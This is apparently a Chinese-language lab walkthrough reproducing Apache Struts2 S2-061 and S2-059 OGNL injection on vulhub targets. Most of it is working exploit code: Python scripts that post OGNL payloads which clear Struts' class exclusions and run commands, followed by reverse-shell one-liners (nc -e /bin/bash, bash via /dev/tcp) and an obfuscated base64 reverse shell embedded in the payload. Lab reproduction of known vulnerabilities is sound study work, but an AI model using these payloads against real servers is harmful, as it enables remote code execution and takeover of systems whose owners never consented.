1.vulhub安装启动靶场环境
(1)s2-061开启靶场
(2)s2-059开启靶场
2.漏洞复现
(1)s2-061漏洞复现
github获取漏洞利用工具
开始利用
(2)s2-059漏洞复现
在linux特有临时目录/tmp下创建空文件,由于通常该目录中不会存在该名称的文件,所以可以作为命令执行的验证命令.
可看到在/tmp/路径下,已成功创建的success文件,说明漏洞利用成功
利用POC如下:
import requests
url = "http://10.1.1.101:8080"
data1 = {
"id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}
data2 = {
"id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('touch /tmp/success'))}"
}
res1 = requests.post(url, data=data1)
# print(res1.text)
res2 = requests.post(url, data=data2)
# print(res2.text)
3.反弹shell
控制端 nc -lvvp 6666
被控制端 nc 10.1.1.101 6666 -e /bin/bash
bash -i >& /dev/tcp/10.1.1.101/6666 0>&1 (被控制端未装nc,就可以使用bash(linux都能连接))
https://www.cnblogs.com/lingzhisec/p/13917529.html
受害端执行反弹shell命令
控制端进行监听
执行反弹shell的POC如下:
import requests
url = "http://10.1.1.101:8080"
data1 = {
"id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}
data2 = {
"id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEuMTAwLzY2NjYgMD4mMQo=}|{base64,-d}|{bash,-i}'))}"
}
res1 = requests.post(url, data=data1)
res2 = requests.post(url, data=data2)